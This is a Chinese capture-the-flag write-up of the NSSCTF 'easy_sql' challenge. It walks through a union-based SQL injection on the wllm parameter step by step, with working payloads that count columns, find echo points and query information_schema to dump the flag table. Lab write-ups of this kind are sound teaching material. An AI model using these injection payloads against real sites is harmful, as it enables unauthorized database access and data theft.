[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析

查看网页

有提示,参数是wllm,并且要我们输入点东西

所以,我们尝试以get方式传入

有回显,但似乎没啥用

从上图看应该是字符型漏洞,单引号字符注入

先查看字段数

/?wllm=2'order by 3--+

没回显

报错了,说明字段数是3

然后查看回显点

/?wllm=2'union select 1,2,3--+

注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。

然后查看数据库名称

/?wllm=2'union select 1,2,database()--+

得到数据库名称就可以按顺序数据库-表-列来找flag了

/?wllm=2'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+
?wllm=2'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+
/?wllm=2'union select 1,2,flag from test_tb--+
相关推荐
Mephisto.java8 分钟前
【大数据学习 | kafka高级部分】kafka的优化参数整理
大数据·sql·oracle·kafka·json·database
newxtc19 分钟前
【旷视科技-注册/登录安全分析报告】
人工智能·科技·安全·ddddocr
成都古河云20 分钟前
智慧场馆:安全、节能与智能化管理的未来
大数据·运维·人工智能·安全·智慧城市
Gworg21 分钟前
您与此网站之间建立的连接不安全解决方法
安全
山海青风35 分钟前
第七篇: BigQuery中的复杂SQL查询
sql·googlecloud
follycat43 分钟前
[极客大挑战 2019]HTTP 1
网络·网络协议·http·网络安全
ac-er88881 小时前
MySQL如何实现PHP输入安全
mysql·安全·php
lzhlizihang3 小时前
【Hive sql 面试题】求出各类型专利top 10申请人,以及对应的专利申请数(难)
大数据·hive·sql·面试题
威哥爱编程4 小时前
SQL Server 数据太多如何优化
数据库·sql·sqlserver
jjyangyou4 小时前
物联网核心安全系列——物联网安全需求
物联网·算法·安全·嵌入式·产品经理·硬件·产品设计